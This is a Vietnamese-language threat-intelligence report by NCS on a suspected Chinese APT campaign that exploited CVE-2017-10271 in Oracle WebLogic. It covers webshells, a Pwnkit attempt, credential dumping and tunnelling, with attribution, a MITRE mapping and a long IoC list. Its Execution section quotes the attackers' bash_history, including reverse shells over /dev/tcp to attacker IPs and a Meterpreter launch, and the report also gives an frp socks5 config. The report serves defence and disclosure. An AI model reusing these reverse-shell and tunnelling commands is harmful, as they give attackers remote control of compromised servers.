Chiến dịch tấn công nghi ngờ đến từ nhóm tấn công Trung Quốc nhắm tới các tổ chức tại Việt Nam

TỔNG QUAN

Bên cạnh các hoạt động ứng phó sự cố (Incident Response) cho các khách hàng trong bối cảnh gia tăng các cuộc tấn công mã hóa Ransomware, đội ngũ kỹ thuật NCS cũng luôn theo dõi và ứng phó các chiến dịch tấn công APT nhắm đến Việt Nam. Thông qua quá trình điều tra xử lý sự cố, NCS nhận thấy một số trùng lặp về cách thức tấn công, công cụ cũng như cơ sở hạ tầng mà nhóm tấn công sử dụng đã từng được mô tả trong các báo cáo được chia sẻ trước đó, liên quan đến nhóm tấn công đến từ Trung Quốc. Nhóm tấn công này thực hiện các chiến dịch tấn công nhắm mục tiêu tới các đơn vị tổ chức thuộc Việt Nam trong khoảng thời gian giữa năm 2023 trở lại đây.

TÓM TẮT

    • Thông qua điều tra xử lý sự cố, đội ngũ NCS truy vết được attack vector, các công cụ mà nhóm tấn công sử dụng cũng như các kết nối đến cơ sở hạ tầng của nhóm tấn công.
    • Với các dữ liệu thu thập và phân tích cùng những thông tin từ các báo cáo của các bên thứ 3 đã công bố trước đó, Threat Intelligence Team NCS gán các hoạt động tấn công đến nhóm tấn công từ Trung Quốc.
    • Chúng tôi cung cấp các indicators đã phát hiện tới cộng đồng, góp phần cho công việc tracking các nhóm tấn công, các indicators này cũng có thể được cập nhật vào các giải pháp bảo mật nhằm củng cố phòng thủ cũng như rà soát thêm hệ thống (Các indicators được mô tả đầy đủ trong phụ lục A: Indicators of Compromises (IoCs))

PHÂN TÍCH

Incident Reponse

Quá trình xử lý sự cố đội xử lý sự cố NCS phát hiện nhóm tấn công thông qua khai thác lỗ hổng bảo mật cho phép thực thi mã tùy ý trên hệ thống bị ảnh hưởng, nhóm tấn công drop webshell và các công cụ tấn công (hầu hết đều là opensource) xuống máy chủ nhằm leo thang đặc quyền, dò quét dải mạng, dump credential, thiết lập các cấu hình tunnel, proxy cũng như thiết lập các kết nối tới các IP được nghi ngờ là C&C nằm trong cơ sở hạ tầng của kẻ tấn công, cụ thể:

Initial Access

Nhóm tấn công thực hiện khai thác ứng dụng được Public-Facing ra môi trường Internet thông qua lỗ hổng – CVE-2017-10271 Oracle WebLogic wls-wsat Component Deserialization RCE. Lỗ hổng tồn tại trong thành phần wls-wsat của Oracle WebLogic phiên bản 12.2.1.2.0 và các phiên bản trước đó do quá trình deserialization không được xử lý đúng cách. Khai thác thành công cho phép nhóm tấn công thực thi các đoạn mã tùy ý trên hệ thống bị ảnh hưởng, từ đó có thể drop các tệp tin độc hại như webshell. Trong các entrypoint có thể lạm dụng để khai thác, kết quả phân tích ghi nhận /CoordinatorPortType11 là entrypoint bị lạm dụng để khai thác.

Execution

Sau khi khai thác thành công lỗ hổng, nhóm tấn công thực hiện tải xuống các file công cụ và thực thi các câu lệnh với tài khoản chạy dịch vụ weblogic.

Ngoài ra, kết quả điều tra cũng cho thấy nhóm tấn công đã chiếm được quyền root trên máy chủ, thực thi nhiều câu lệnh cũng như các tệp tin độc hại nhằm dò quét cũng như khởi tạo kết nối (được ghi nhận trong bash_history của tài khoản root).

telnet 182.93.84.21 42131 (8088, 8291)

chmod a+x 66.elf (mettlesploit)

./66.ef

bash -i >& /dev/tcp/185.14.30.135/443 0>&1

bash -i >& /dev/tcp/154.39.153.42/8888 0>&1

ping baidu.com

./bs -h 106.52.166.241 -p 12308   (blueshell)

……………………………………………………………

Persistence

Ngoài các webshell được drop trên disk, nhóm tấn công sử dụng thêm memshell (một dạng webshell được inject trong memory gây khó khăn hơn trong quá trình phát hiện). Nhóm tấn công sử dụng opensource memshell để triển khai webshell dạng này.

Privilege Escalation

Các bằng chứng trên máy chủ bị tấn công không đủ để xác định chính xác phương thức leo thang đặc quyền nhưng máy chủ này được ghi nhận đã từng sử dụng mật khẩu yếu với tài khoản root (phát hiện mật khẩu yếu đi kèm tài khoản root trong output của fscan, bash history cũng ghi nhận câu lệnh thực thi fscan cùng tham số -pwd). Kiểm tra tiến trình cũng phát hiện việc sử dụng python và netcat để khởi tạo reverse shell và thực thi script Linpeas cho phép tìm kiếm các điểm yếu bảo mật cũng như lỗ hổng có thể lạm dụng để leo thang đặc quyền.

Ngoài ra đội ngũ điều tra cũng phát hiện bộ công cụ khai thác lỗ hổng trong polkit – CVE-2021-4034 (a.k.a Pwnkit) được tải xuống và thực thi trên máy chủ bị tấn công. Tuy nhiên, kết quả điều tra cho thấy quá trình thực thi khai thác không thành công leo thang đặc quyền.

Credential Access

Nhóm tấn công thực hiện hành vi thu thập thông tin tài khoản đăng nhập trên máy chủ thông qua sử dụng các công cụ giải mã mật khẩu weblogicmimipenguin.

Discovery

Phát hiện nhóm tấn công tải xuống và thực thi đa dạng các công cụ opensource trên máy chủ bị tấn công. Các công cụ này hỗ trợ cho quá trình dò quét cổng (port), dịch vụ cũng như scan một số lỗ hổng bao gồm: Fscan, TideFinger kscan, netspyNetouter.

Command and Control

Các công cụ hỗ trợ tunnel, proxy được phát hiện bao gồm Frp, Stowaway, rsocks, ew. Bên cạnh đó, đội ngũ xử lý cũng ghi nhận các tệp tin mã độc có các tính năng tạo kết nối tới các địa chỉ IP nghi ngờ C&C bao gồm Blueshell, Xnote, Mettlesploit, SprankRAT và biến thể của Gh0stRAT.

ATTRIBUTION

    • Trong các command được nhóm tấn công thực thi, phát hiện nhóm tấn công kiểm tra hoặc thiết lập kết nối tới nhiều địa chỉ IP. Một số IP khác được ghi nhận trong config của fast reverse proxy và tham số trong câu lệnh thực thi của Stowaway

#bash_history

182.93.84.21 (42131, 8088, 8291) (telnet, ping)

185.14.30.135 (443,53,7003,58068), 154.39.153.42:8888, 175.178.0.20:8001) bash_shell

106.52.166.241:12308 thiết lập tham số cho Blueshell client

154.39.248.121 (curl)

#frpc

[common]

server_addr = 64.176.85.105

server_port = 7000

use_encryption = true

use_compression = true

[socks5]

type = tcp

remote_port = 1050

plugin = socks5

#Stowaway

./L  -c 206.189.244.183:58888

 

    • Trong số các IP đã mô tả ở trên, IP 106[.]52.166[.]241 được ghi nhận là C&C của metasploit có vị trí địa lý tại Quảng Châu, Trung Quốc. IP 206.189[.]244.183 được ghi nhận là C&C Cobaltstrike sử dụng chung jQuery malleable profile đã được phát hiện trước đó.
  • Thông qua quá trình rà soát, thu thập và phân tích các tệp tin mã độc ghi nhận các địa chỉ IP 45[.]77.174[.]174:8038[.]54.119[.]156:18080 và domain b[.]niupilao[.]vip:80 là các C&C server.
    • Địa chỉ 45[.]77.174[.]174:80 được khởi tạo kết nối từ backdoor Xnote (tệp tin ELF iptable6 nằm tại đường dẫn “/bin/iptable6”), kết nối này vẫn được ghi nhận trong quá trình rà soát.

    • Địa chỉ IP 38[.]54.119[.]156:18080 được ghi nhận khởi tạo từ RAT Spark (./pki ; ./356), RAT Spark cũng từng được mô tả trong báo cáo của Sentinelone, được cho là có liên quan đến Chinese-speaking threat actor.
    • Domain b[.]niupilao[.]vip được khởi tạo kết nối từ backdoor (biến thể của Gh0stRAT), phân tích từ tệp tin tại đường dẫn “/tmp/CCCCCCCC

  • Ngoài ra, cũng phát hiện việc nhóm tấn công có thử kết nối tới website thuộc Tổng Cục Hải Quan tỉnh Quảng Trị (quangtri.customs.gov.vn) thông qua curl command, các báo cáo trong 2023 của Recordedfuture cũng mô tả về các hành vi tác động tới các cơ quan đơn vị thuộc Chính phủ Nhà nước Việt Nam của nhóm tấn công RedHotel bao gồm chiếm quyền điều khiển của Viện Khoa học tổ chức nhà nước Việt Nam – isos.gov.vn và đánh cắp TLS certificate của Bộ Giáo dục và Đào tạo – moet.gov.vn.
  • Phân tích access log, phát hiện nhiều IP cùng truy cập đến 2 webshell “MD18.jsp” và “S8n1.jsp” trong một thời gian dài. Trong đó có IP 156[.]146.56[.]136 cũng được Volexity ghi nhận trong 1 chiến dịch tấn công trước đây.

Dựa trên các kết quả điều tra và phân tích về TTP và cơ sở hạ tầng được sử dụng, đội ngũ TI NCS nhận định chiến dịch tấn công được thực hiện bởi nhóm tấn công đến từ Trung Quốc.

MITRE ATT&CK

Tactics Techniques Description
Initial Access [T1190]          Exploit Public-Facing Application Khai thác lỗ hổng CVE-2017-10271 cho phép thực thi mã tùy ý, drop các file độc hại
Execution [T1059.004] Command and Scripting Interpreter: Unix Shell Kẻ tấn công sử dụng /bin/bash /bin/sh để thực thi câu lệnh
[T1059.006] Command and Scripting Interpreter: Python Kẻ tấn công sử dụng Python để tạo reverse shell
Persistence [T1505.003] Server Software Component: Web Shell Kẻ tấn công thực hiện upload webshell
Privilege Escalation [T1068] Exploitation for Privilege Escalation Khai thác lỗ hổng CVE-2021-4034 (Pwnkit) để leo thang đặc quyền lên root, tuy nhiên kết quả điều tra ghi nhận khai thác không thành công
[T1078.001]  Valid Accounts: Default Accounts Qua điều tra cho thấy kẻ tấn công có khả năng chiếm được tài khoản root thông qua mật khẩu yếu
Credential Access [T1003.007] OS Credential Dumping: Proc Filesystem Kẻ tấn công sử dụng mimipenguin để thu thập thông tin xác thực từ máy nạn nhân
[T1212] Exploitation for Credential Access Kẻ tấn công sử dụng công cụ giải mã mật khẩu weblogic
Discovery [T1049] System Network Connections Discovery Thực thi các công cụ trong quá trình dò quét
Command and Control [T1572] Protocol Tunneling Kẻ tấn công sử dụng công cụ hỗ trợ tunnel và proxy
[T1090] Proxy

 

Phụ lục A: Indicator of Compromises (IoCs)

Tên File Hash (SHA1) Mô tả
111 3722fb3d417bb4d08d4eed211fd1de237be5a94d Pwnkit
traditional 52400d1432fa38582f529bf38286f76546d32664 netcat
356 39575c89f37ac1ae45bed734059bc7bca925f805 SparkRAT
s4 f4866030cb84292cf493c4065712668478005f52 fscan
fscan dc26aa1f01a3cb7c2ad487982efbcfe378d9acc6
fscan32 5b0053f30a6572b422fd723997edd8bbc6210386
a 3b1329e81739b1ea6acbb4ec4dff11f02ff42570 fscan
ac 3619c46f888b03d3c12379cb901877fb8880da20 EarthWorm
bJrEOb daf915ca672e0100f0a9dd87f8194972d468f2d2 Java archive – memshell
L84RlS d15f383a76ca01a93ee768da156cc1b31e0ff4ba Java archive – memshell
bs 36cff870bad8009dadc399d14b41abb3afa3a341 blueshell
linpeas.sh 7895f22df1ad0b154a9bf6da8d7479ca38f3afec
3.elf f318463ec539069fd388544dadf2efe9a128ec11 mettlesploit
66.elf 63858b2248b65b1d071b6540e591622c5ba119f4 mettlesploit
k 57a26be3e175fe41fd2581cb7d9c95c7f0b14cf4 kscan
l 8138eba6398650bdbf0c9483515fa5766ef3427a Stowaway
mimi.sh a0267324300e453a55c727e7c9e20ba419e86260 mimipenguin.sh
netspy 8c36cd8efd722d03bf60a03e0cde2837f1190b92 netspy
pki a1d89a0e22a522c062d8f7c3b70a7ef1465d1c88 SparkRAT
ew_for_l 3619c46f888b03d3c12379cb901877fb8880da20 EarthWorm
NetOuter 368548d180c2e402dd1f3a53f7b46f71df3c9872 NetOuter
f64 7dbb1c0e421a49bad2a8dd867a1188df10c5f458
bktest 0b597560096064577282024a77c693da8eccb0bf
he1p b0775d0f4e259fcfb336e9d1b1d45941c00be941
CCCCCCCC 1afd03b91e73db0de7685af473530503bc9257ff variant Gh0stcat
cve-2021-4034.sh 636089FA2CACE9CC33F482D348E9DE8CB5CFC571
TideFinger 7DD9B575C0DCED8A0D7E22635220A18B601519D2
iptable6 eac13a0d88cc0d5fa1d9ebbbaa91c26fcbb962de Xnote
frpc DE9FE0334E9E91F43C498519CDD8DDB010441F3F fast reverse proxy
s5c.py 1563351B8AC708F6BE33083C9A84FC5857363255 Reprocks – python socks5 proxy
fr ea10b9f49549286f27df24221e0d485c103a9c33 rsocks
tide.jsp 2bafd82920b3de79303fda881bdac8c16f55b98a webshell
optdir.jsp ef6f4561fecd17bc55534a3b96cecb4032b786c5
gsl.jsp 06c929038ddac1dbc5afa0d639fa770b88307870
test11.jsp c8e64e779c5dc2144a0ce47e56901abf42c20ae2
test22.jsp dfee8b38296870c42d4be2684cb60168269f108b
Login.jsp 386321c7c345695f3061cdc9e87f649733470e5e
config1.jsp ace8e049b5b4eb8f953a22549e7d5e8a4fb1eae6
index.jspx dc653db41dd07cd1642e7b1184351364f9f85483
random.jsp d4887f9df935e081796d08c00c31e2a65e05ae81
1.jsp 2dc7dec15ff62d7fdf62b1ead4569b091b9eec15
2.jsp 2dc7dec15ff62d7fdf62b1ead4569b091b9eec15
cc.jsp 571f21f28f92c0a4abad9491b0ebccbd4b37e3cd
n6eHIZ1.jsp dfcda2b286613ee10b62ea36a98f894fdf5f9fe9
n6eHIZ2.jsp 8390d75807d001d039bf5ad5444b93f916f1ba57
t111.jsp ef2efba2f9a2a7a8e49004b8faa01b981bf8e3d1
test33.jsp c0782245dcb91a864924e730d77f29906003147c
Login.jsp 386321c7c345695f3061cdc9e87f649733470e5e
index.jsp 236c55ec9cb602bea610434dc4f7752a491795bb
1deW3i.jsp 571a6796900888f32390008cd7e910ea4eb40193
2deW3i.jsp 6e56d6d6e41fe7fd9eb328453266f58ba8d1ba7f
3deW3i.jsp 6b37ea71078e47be7eff16ede3257ab74692ed43
MD18.jsp b727eb2545c19536a8d42ff7279e47939cf3a9bc
S8n1.jsp 0428a952e21101e3d4689d4439fdaa8c877ab097
bakup.jsp 2bd37f45fa552b0cabd07b58bbe2c9f8216eefe9
bd1W.jsp 5b4c741ec955ce3397ee0c57f07bff8ffd98c885
bdD1W.jsp a618121978ba1024dbddcfc39d60db267a0ed0fc
cbc.jsp d7c5e3077010fb37092f6dedadc0616ae655724b
config_api.jsp f0f74f11ff116954a68222553f8235c85b2218a1
deW3i.jsp 571a6796900888f32390008cd7e910ea4eb40193
gsl.jsp dd8ca78353638d275f36d864a79e8ac8b3a1eb17
images.jsp 26458d5ee84546db4d1b5aa87b2fe7ff2d620999
info.jsp e6c9730968b77116dbe1507b4a772357f61cbd97
ini.jsp e9da007db5059096936f06eac5aea16d17448a07
opt.jsp 39ff1d7667b74477334b9d80472021b44c7e8abe
optdir.jsp 39ff1d7667b74477334b9d80472021b44c7e8abe
pk.jsp 67b590af8d78547a03683e0cc314970d27de0305

 

C&C:

106[.]52.166[.]241

45[.]77.174[.]174:80

38[.]54.119[.]156:18080

b[.]niupilao[.]vip:80

185[.]14.30[.]135

154[.]39.153[.]42

175[.]178.0[.]20

Suspicious IP:

182.93.84.21

183.93.84.21

54.39.248.121

154.39.248.121

206.189.244.183

64.176.85.105

Danh sách các IP truy cập 2 webshell MD18.jsp S8n1.jsp và các webshell có nội dung tương tự:

156.146.56.138

89.187.163.211

89.187.163.135

156.146.56.136

138.199.60.185

89.187.162.185

89.187.163.216

89.187.163.142

103.216.223.206

89.187.163.201

156.146.56.133

149.34.253.147

89.187.163.198

146.70.192.110

89.164.99.137

85.10.51.92

85.10.56.191

176.222.34.133

85.10.56.228

89.187.163.206

176.222.34.122

89.187.163.203

156.146.56.133

89.187.163.218

149.34.253.149

103.216.223.204

89.187.163.131

89.187.163.135

89.187.163.196

89.187.162.187

89.187.163.206

138.199.60.187

146.70.192.110

89.187.163.213

210.56.55.53

85.10.56.191

176.222.34.133

85.10.56.228

85.10.51.92

89.164.99.137

54.255.35.159

209.146.30.250

8.213.196.159

45.154.12.215

107.172.140.33

104.243.17.81

149.154.161.201

103.186.117.224

165.22.243.96

122.100.249.253

103.45.64.232

38.94.109.209

149.154.161.204

149.154.161.246

124.105.3.211

3.39.225.57

149.154.161.199

149.154.161.219

176.222.34.122

 

Author: NCS Threat Intel